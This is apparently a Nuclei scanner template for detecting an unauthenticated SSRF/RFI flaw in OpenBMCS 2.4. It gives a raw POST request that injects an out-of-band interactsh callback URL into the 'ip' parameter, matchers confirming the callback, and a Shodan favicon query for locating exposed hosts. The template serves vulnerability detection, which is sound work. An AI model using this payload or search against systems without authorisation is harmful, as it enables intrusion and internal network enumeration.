nuclei-templates/misconfiguration/openbmcs/openbmcs-ssrf.yaml

36 lines
1.5 KiB
YAML

id: openbmcs-ssrf
info:
name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
author: dhiyaneshDK
severity: high
description: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter
'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary
destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking
the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
reference:
- https://www.exploit-db.com/exploits/50670
metadata:
shodan-query: http.favicon.hash:1550906681
tags: ssrf,oast,openbmcs,edb
requests:
- raw:
- |
POST /php/query.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip={{interactsh-url}}:80&argu=/
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: status
status:
- 302